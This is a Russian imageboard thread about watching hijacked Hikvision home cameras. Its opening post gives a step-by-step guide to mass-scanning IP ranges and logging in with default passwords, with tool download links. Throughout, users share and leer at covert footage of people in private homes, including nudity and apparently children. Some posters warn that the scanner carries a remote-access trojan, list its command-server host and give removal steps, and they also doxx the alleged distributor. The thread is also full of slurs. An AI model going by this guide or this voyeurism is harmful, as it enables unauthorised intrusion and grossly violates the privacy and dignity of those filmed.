ТАК ЕСТЬ ЛИ ВИРУСЫ ИЛИ НЕТ ОПРЕДЕЛИТЕСЬ ? пошёл нахуй оп-далбоёб ОПа ответ! вайрусы есть Просто скачай из другого места, и не морочь себе голову. А у тебя вебка есть? Оп хуй засунувший анальный зонд утверждает что все нормусь. Причин ему не верить уебать не вижу, хули. Ты че дурак блять ?.вебм + не лезь блядь дибил сука ебаный.пнг Virustotal (+30 антивирусов) не может ошибаться. https://www.virustotal.com/en/file/004e6e0723346405439e5978942d14d3807f1085762b9f520f27230906779990/analysis/ > https://www.virustotal.com/en/file/004e6e0723346405439e5978942d14d3807f1085762b9f520f27230906779990/analysis/ что делать на помощь 6ump. Даже в зоопарке камера. а как он блядь заражает то? Бляяя плиз а есть продолжение где та свиноматка голая? хочу ее сиськи увидеть почему постят обрывочно, ведь полюбому же дальше запись продолжалась. Бедный адам. У него видимо аутизм (характерные взмахи руками) и мама расправляет ему кровать. Ещё намеренно глядёт подушку посреди кровати. Похоже это единственный способ как он может спать. Жалко мальчика стало. двачую у самого такойже только красивый не толстый лол. Эта мамаша напомнил мне российский фильм. Там еще еще её внук в ванне обосрался и деньги семьи испортил Что за фильм? Не помню.Давно смотрел Да Палю сурс Похороните меня за плинтусом спасибо. там еще у этой поехавший были царапины на лице? похороните меня за плинтусом вот этот фильм Опа, американскую камеру взломали, кек Проверка видеорегистраторов и IP камер Hikvision на простые пароли. ИНСТРУКЦИЯ: 1) Скачиваем, и устанавливаем iVMS-4200, и весь софт. 2) Создаем отдельную папку для нашего VNC, закидываем его туда, и запускаем. 3) Ищем диапазоны IP, и вставляем в большое окно программы. (Чем больше IP - Тем лучше) 4) Потом вписываем порт 8000 в двух местах, внизу окошка с IP, И вверху справа от окошка IP, и нажимаем на кнопку "Start scan". Когда программа завершит поиск рабочих камер (В среднем это занимает 1 час), нажимаете на кнопку "Start parser", и закрываете программу. 5) Копируете IP из IPs.txt, и вставляете в файл hosts (Открывать чем угодно, например: блокнотом), который находится в папке Hikka. 6) В папке Hikka будет файл Start.bat, жамкаете на него и у вас открывается консоль, далее программа сама прочекает IP адреса на стандартные Login и Password, которые указаны в файлах "Login" и "Password". 7) Результат вашего труда Вы увидите в папке pics.(В названии картинок указаны данные для подключения) 8) Запускаем программу iVMS-4200, и вводим любые данные для входа в программу. Потом заходим в "Управление", "Добавить устройство", и вводим данные для подключения. Более подробная инструкция в картинках от Пикабу-дебилов: - http://pikabu.ru/story/_3294899 Скачиваем iVMS-4200 - http://www.hikvision.ru/product/ivms_4200 Скачиваем VNC сканер - http://rgho.st/8RSSgc89Y - Пароль стандартный. - 2ch Скачиваем Hikka - http://rgho.st/7xDhfWcc2 Сайт с диапазонами городов - https://4it.me/ Постим здесь айпишники РАБОЧИХ КАМЕР, ЖЕЛАТЕЛЬНО С ПОДЕРЖКОЙ ДВУХСТОРОННЕГО АУДИО , полезный контент по сабжу, проигрывем с вебемок, вводим в курс дела ньюфагов. Совас 4! И как удалить ВИРОС ? Нет там вируса, даун который кукарекал уже забанен. Настало то самое время... Нужно материнскую плату менять, ну ты и попал В смысле, что делать если камеру взломали? просто поменяй парроль. Пройдись DrWeb CureIt лучше с LiveCD Вирус сидит в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы Найс советы даешь. Лучше удали system32, там точно вирус. Проверьте этот файл на вирустотал,это файл трояна который конектится к drendround.ddns.net https://virustotal.com/ru/file/8816ec5326530ff53fa6ae1e6923695c9e044f09054f6853b5ff0f7d92028879/analysis/ лол, ты даун какой-то. К тому же, антивири всегда орут на хакерские проги. Свали в лес, быдло. yebaniy ty stid. tam i miner i backdory. sidit, sam neznaet chem targuet i pizdit esce кекнул с тебя, маня. > https://virustotal.com/ru/file/8816ec5326530ff53fa6ae1e6923695c9e044f09054f6853b5ff0f7d92028879/analysis/ Даун блядь ты запароленый архив залил.Без пароля Авири не могут просканировать содержимое здесь тока один даун, и эт ты. Почему там частично белые буквы и частично черные? Чтоб экран, на котором смотрят видео с камеры круглосуточно, не выгорал. Буквы попеременно меняют цвет. Не так. Буквы меняют цвет в зависимости от яркости фона в районе буквы чтобы лучше читалось. Хмм... Присмотрелся повнимательнее к некоторым видео. Похоже, ты прав. Спасибо. >2k17 >Скачиваем, и устанавливаем шо не так? Где контент пидор? Хули шебмки всегда одинаковые из треда в тред уёба? А где мне взять контент, если вы ничего не пилите? Он доложен сам по себе в тред отправляться? Для кого детальнее некуда инструкция в шапке треда? >о детальнее некуда инструкция в для тех кого ты хочешь заразить своим вишмастером Щас бы с помощью вишмастера контент пилить ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны >сли нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить Может найти его и порезать к хуям? ОПа?Я только за.Уже абуз написал его провайдеру А смысл. Он же из киева. А если таких файлов не было? Был файл и процесс pci как-то там, его когда завершал то синий экран вылетал, в cmd появлялся его адрес, потом удалил этот файл, адрес пропал. Я все правильно сделал? pcimgr* да,правильно.Видимо оп пересобрал трой и теперь на жестком он лежит не там.Так что надо ориентироваться по сетевым подключениям т.е все? Я сейчас вебом все сканирую Проверь автозагрузку и диспетчер отложеных задач,удали лишнее а как ты узнал его мыло и стим если не секрет скажи не смогу уснуть Его вирус конектиться к drendround.ddns.net .Я гуглил drendround и нашёл его посты на двощах в тредах с раздачей ключей стима на почты и просто гуглил и гуглил >Когда у человека есть настроение, то он у него появляется желание выполнять какие нибудь движения/действия, которые принесут ему какое либо удовлетворение Но почему именно танец, который является сугубо демонстративным инструментом сексуального характера? Потому что она пизда и ей свойственно всё, связанное с еблей и сексом? >сугубо демонстративным инструментом сексуального характера? ты так сказал? И мне кажется, что если бы там танцевал мужчина, ты бы ничего не написал бы.Ты что, обижен тней? Потанцуй - поймешь. >почему именно танец Движение, если ты здоров, вызывает удовольствие. Танец - доступная форма движения. Ты - дурак. как объяснить поведение танцующей самки? Рядом нет самца, для которого она танцует. Её напарнице судя по всему тоже насрать, она даже не смотрит на танец. Что это? Попытка поднять свой рейтинг перед напарницей, показав свою бОльшую сексуальность и гибкость? Эдакая безобидная агрессия? Хорошее настроение, танцевальная музыка. >танцевальная музыка. музыку наложили же аноны поверх? Да. Но, там тоже была музыка. Нет, я просто пытаюсь оправдаться в своей тупости. Там могла быть музыка получше этой Была музыка. Был в первых тредах, видел оригинал ты аутист? Когда у человека есть настроение, то он у него появляется желание выполнять какие нибудь движения/действия, которые принесут ему какое либо удовлетворение Зачем в таких местах вообще камеры ставить, лол съемные квартиры же. чтобы шлюхи не спиздили борщ Ветеран ivms-тредов вкатился. Моё увожение. Каспийский монстр? лунь тупица соус rfvths 6ump. Картина маслом: батя с сыном вернулись из бара. У сынули дцп. а батя с похмелья просто? там нет бати, только дети. блять лол, думал, что сын с батей катаются по полу Кто как и зачем ставит камеры в квартирах? И да, люди настолько слепые, что не видят ее? Практически во всех вебмках камера установлена в углу комнаты, под потолком. Есть же специальные шпионские камеры. Ну да, если потолок белый, она прям незаметная нахуй? А если потолок, например, подвесной + натяжной + барельеф + декор, хуй ты скрытую камеру отличишь от светильника, например. Кроме того, некоторым вообще похуй на камеру, а некоторые думают, что она не доступна злоумышленникам. Следить за маленькими детьми, нянями и прочими наемными работниками. ЭТО ПЕРЕКАТ? 6ump. /id2958425 на нее похожа. А могла бы пользоваться моим хуйцом. Видимо всем похуй. От меня спасибо за своевремнное реагирование я и не собирался ставить эту говнину на рабочую машину, такой софт по дефолту считаю зараженным пока не доказано обратное . Поделись советами "системной безопасности". Как проверять проги? юзаю виртуал бокс как песочницей - не хватает мощности для игрушек Как ловить лулзы с зараженного ПО ? Качать и распаковывать можно,запускать нельзя нельзя,проверять расширение файла,после распаковки проходить антивирусной утилитой и если ничего не детектируется,то считай тебе повезло,если детект есть - в топку.Сверяй MD5-хеши у файлов и заявленные для чистых файлов.Вобще неплохо иметь наборту антивирус и просто быть внимательным.Мелкие файлы можно чекать на вирустотале,сразу становится понятно что это за хрень.Чтобы повеселится можно определить куда конектиться кейлогер или трой и сдать провайдеру который владеет этим адресом или попытаться сдеанонить как в случае опа-хуя,для мамкиных кулхэцкеров можно попробовать дудосить с дедиков этот а дрес,а вобще лучше нетрогать зараженные файлы , а сразу в топку Как быть с игорями ? Чет в последнее время стал стрематся ставить игры с рутрекера. и правильно делаешь.Ща найду откровения бывшего модера рутрекера.Модеры трои в раздачу подкидывали и поставили это на поток Игори покупать.А если нема бабла,то каждый раз проверять скачаные установочники антивирем Это не истинна в последней инстанции,я просто описал что делаю я.... Это всё, что в нём было. Алсо, ОП настолько хуй, что указал в автозапуске программу с названием "x", просто икс блядь, максимальная беспалевность. А как понять что в cmd файле было прописано? Я расширение на txt поменял, а там каша блядь. Неси сюда,будем гадать Все пытался выковырять эту ёбань,но она самоудалялась у опа хуя реально вирус, вы мне лучше скажите, что значит строчка в vbs файле on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Pes\AppData\Local\Temp\IXP000.TMP\z.cmd",1: скинь полный листинг.В случае ошибки пропустить запуск .cmd файла (аналог .bat) из %LOCALAPPDATA% ,пёс >Run "C:\Users\Pes\ Запускает пса какого-то мб? Лол,это папка пользователя на компе тупая пизда, не может лечь нормально так и легла к тому же поверх смятого одеяла, что очень неудобно. Выселите её нахуй в дагестанскую общажку. Это мальчик. Хуле ты уёбок бомбишь по всему треду? Да,оно,называл,ОП любитель вишмастеры называть системными именами PCI Manager,AGP Service.А кашу из cmd кинешь? Не, уже выпилил, сейчас винду буду переустанавливать. Ну его нахуй что-либо с харкача скачивать, вишмастеры ебучие Pes А че там кидать? Пока ты будешь несколько дней искать камеру с динамиком, за 50 рублей её можно купить и не париться. Серьезно? Ты сейчас шутишь? Или это реклама? Где купить то? Не ведись на это, это реклама. vk.com/ipcamhack так и знал шо реклама. "какой я охуенный, надо подрочить на себя". В чём профит спускать в трусы, потом ходить же противно Его может возбуждать сам факт совершения развратного действия. Кому-то нет. Я люблю спускать в трусы Каждый день появляются новые камеры. И вообще, Анон много годноты находил. Бодели как пример. ?Бордели fix >Win+R→cmd→ОК→netstat -a→Enter Аноны эта команда мне ничего не сделает? netstat (network statistics) — утилита командной строки выводящая на дисплей состояние TCP-соединений (как входящих, так и исходящих), таблицы маршрутизации, число сетевых интерфейсов и сетевую статистику по протоколам. почему тогда твои посты удалили????????????????????????? не мой пост был. Бан дали дураку, который вайпал тред Мне лень регистрироваться в ваших скайпах. И я же не быдло. В танки гонять ты значит быдло,а теперь не быдло да DrendRound? Анон, объясни, зачем люди ставят камеры в своих квартирах? Чтобы аноны заходили и дрочили Это на съёмных квартирах. Теперь буду проверять каждый уголок она блядь че делает сука? фарширует его/её чтоли? Подмывает. Бабка лежачая уже. Медицинская кровать, не видно чтоли? бля, ахуенно как то. Ламповостью веет что здесь лампово? кот? Атмосфера. Ободранная хрущевка и тян ковыряющаяся в жопе - это лампово? Это может быть атмосферно, только нахуй такую атмосферу. Лол, не заметил, что она ковыряется в очке. Она еще и готовит потом немытыми руками. какой блять ламповостью? Обшарпаные стены облупившийся потолок, вырванная к хуям люстра, на полу какойто мусор накидан блять лучше бы ты русский язык знал. ОП,залогинся,бомбила Научи логиниться на сайте без регистрации, пожалуйста. иинах схватил вирус чё делать то ? Скажи мамке что заболел - можно в школу не идти. Кем работает эта тянка? Это она в треде сидит и смотрит камеры. скорее всего товаровед в мини маркете windows/run!.exe Что это? двачую,но это лоадер в SFX архива сам бэкдор подгружается потом 6ump. Лол. Вангую там в рамочках фотки детей и жены))00 Я не понял, там Ленин ее ебет что ли? 6ump. 6ump. Трусы забыла надеть! Там половина таких. Я теперь начинаю догадываться, нахуя тян в тренажерку ходят. О ужас, какое искревление. врач в треде? 6ump. я один заметил какие то шары чо это такое блядь призраки ? 6ump. тольятти ЧТОООООО? мимо из тольятти сука как вчера помню смотрел онлайн)) 6ump. зрение же так посадишь и ладошки волосатые будут Типичный двачер. И кончил себе на пузо, зашкварился. 6ump. Подумал что левая нога блестит от масла До меня медленно дошло, что это не магазин. Всмысле? Это шоурум (магазин) Точно ли? А не шкаф с одеждой? Ну чисто теоретически это может быть гардеробная, но тогда почему в ней не представлен весь тип разной одежды хозяйки, а только пара видов, ди и в верхнем правом углу коврик зачем такой в комнате лежит? Скорее всего это коврик из примерочной. Я всё-таки сказал бы что это шоурум. 6ump. Нахуй все эти жиробляди любят так своими телесами потрясти? Приятного блядь аппетита, ходишь такой сука на кухне. Друг есть такой же жирдяй, тоже фанат этой хуйни. Тому що они тру альфы и им похуй на комплексы. ТЫ ПРАФУУУУУУРА 6ump. Что это за пиздец? проиграл с этого футболиста 6ump. @p0t0M oN! 8C# p0#B@lNcR Сукааааа как же я проиграл!!!!! 6ump. друган просит ишо такого 6ump. Есть кулстори ?? схуя они портят чужое имущество схуяли за ними зырят, м? Тоесть всем кто на меня посмотрит можно выбивать глаза ? А всем кто слушает - уши ? дивный новый мир слепых и глухих Ну держись там, удачи и хорошего настроения. Спасибо. Чё с деньгами? Уже вложено все в бюджет Понятно. А с деньгами как вопрос обстоит? Пьяный что ле ?! Лямку затяни! Чё затянуть? Как там с деньгами обстоит вопрос? Пиздец я бы далел кучу фиктивных чеков на ремонт камеры, плюс оплату за монтаж демонтаж и всем бы этим уебанам предъявил через суд лол. ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны Не обучаемые. ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны За обход бана тоже банят. И такой бан ты уже своим умишком не обойдешь. а меня и не банили,просто посты удалили.Да и тем более я пытаюсь уубереч людей,от вирусов которые распространяешь ты,дауненыш Сколько тебе лет? побольше чем тебе,соска ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны Спасибо анон. ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны Я ссылкам с двачей не верю и ничего не качал, но всё равно спасибо тебе добрый человек, хорошее дело делаешь. ОП если ты туда вирус засунул то пусть тебя выебут в жёпу. ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны Спасибо, анон. На всякий случай продублирую твой текст, пусть большая часть увидит. >ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны Господа кулхацкеры, объясните пожалуйста: 1) Зачем и для чего люди ставят ip-камеры в квартирах или это хозяева жилья снимающим жилплощадь установили скрыто? Для чего вообще они это сделали? 2) Можно ли подобным или иным способом взломать камеру смартфона? Возможно ли это вообще и как если да? мимо академический интерес гугли StageFright dr web нашел 3 вируса . 2 пидорнул , а 1 почему-то не смог , или не захотел. я весь тред уже раза 3 пролистал весь но так и не догнал что делать . если не сложно можно поподробней обьяснить что делать ? Почисть автозагрузку,отложенные задания,найди файл вируса и Unlocker Assistant поставь удаление при следующей загрузке,потому что пока комп включен и процесс запущен убрать его и удалить файл не получится,будет BSOD ищи на диске С в Программ Файлс папку связануюс AGP или PCI ,там один exe - это вирус После прочтения прошлого треда решил попробовать. Убил 6 часов на эту хуйню. Проверил около 60 диапозонов, нашел 1 работающую камеру - пустой склад. Так что идите ка нахуй с такими тредам. Бля помогите подхватил это говно вроде бы удалил и dr web тоже что то удалил , но что то напрягает комп медленее грузиться . Анон что делать обьясни , а то я в этом не разбераюсь Проверь еще раз Я одного не пойму. Каким образом на некоторых вебм аноны выводят звук на взломанную камеру? Там какие-то йоба-камеры со встроенным динамиком? Именно. Кстати, динамик для 2-сторонней аудиосвязи имеют даже дешёвые камеры, типа Yi Xiaomi Smart Ants Зову опа в скуп пояснить за вирус,если откажется это будет признание в том что он занимается распространение вируса BackDoor.NJrat.MSIL start menu/programs/startup/google updates.exe local settings/temp/server.exe мимо-анон-просто-смотрю-вебмки-в-треде-нахуй-мне-сдалось-качать-программки-какие-то-кэк двачую адеквата То есть с помощью этого софта можно подключиться к практически любой рабочей камере? От производителя Hikkvision, и на которой пасс не поменяли. ИМХО лучше у барыг купить. Они все камеры с динамиком за один скан себе забирают. бля чё делать это гавно на моём компе я нихера не разбираюсь . анон что делать ? DrWeb CureIt и я в этом треде уже обьяснил что делать,полистай Сейчас бы в двачах на сомнительные ссылки переходить. Ору с долбоебов Никочайце пацаны там вирус!! брат умер. пишу с микроволновки Анон, поясни, какого хуя эти вебки делают в жилых квартирах? За квартирантами наблюдать, чтоб хату не разгромили. ебать, они еще и ноги какой-то хуитой натирают? еабнуться Естественно спермой натирают, чтобы привлекать самцов. самцовой спермой самцов? это шоб геев приманивать? Вы и в этот раз в сканер невидимый радмин засунули? да. "невидимый" - это как:? опхуй конешно но я итаг знал что всофте хуйня сидит Братва, какие пароли и логины ещё попробовать? Ищи в интернетах стандартные логи и пароли к камерам. Доставьте шликающих тянок, если есть. уже в треде несколько вебмок было Зажигалка- в Н.Новгороде вроде В моей 100к мухосрани тоже есть такая. че это блядь за место такое? Геи приходят на "массаж". тебя всё ещё не забанили? >не забанили? забанить должны тебя,за ботнет Опиши суть метода Лень. она вор? Бордель? 6ump. 6ump. 6ump. Бля, встал. Лизать тянке охуенно, не нужно двигаться как еблан, лежи да лижи, а она пососёт и все довольны 6ump. Классика. хех. 6ump. 6ump. 6ump. А продолжение? 6ump. 6ump. ОКР ритуал 6ump. 6ump. общение с натащками 6ump. Я помню этот ролик. Пили прохладную. 6ump. 6ump. Да кто это блядь такие? 6ump. Моар адама. И постарайся делать кадры где нет голых детей 6ump. Что они все время лезут снимать камеры? Нельзя просто пароль сменить? 6ump. проиграл 6ump. Пидор гнойный тебе здесь не рады.Сьебись. 6ump. золото 6ump. Вот поэтому бабы и изменяют вот таким уебкам. Пузо висит, хуй не стоит, ебать не умеет. Пиздец нахуй. 6ump. 6ump. Проиграла лол) 6ump. Ох хороша, ебал бы джва часа. 6ump. Давит прыщи на пизде через пару дней после бритья. 6ump. Блядь, с этой проиграл 6ump. Жена дорожника? 6ump. есть стори 2ого? 6ump. >2 шебм Проиграл с этого бати. ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы 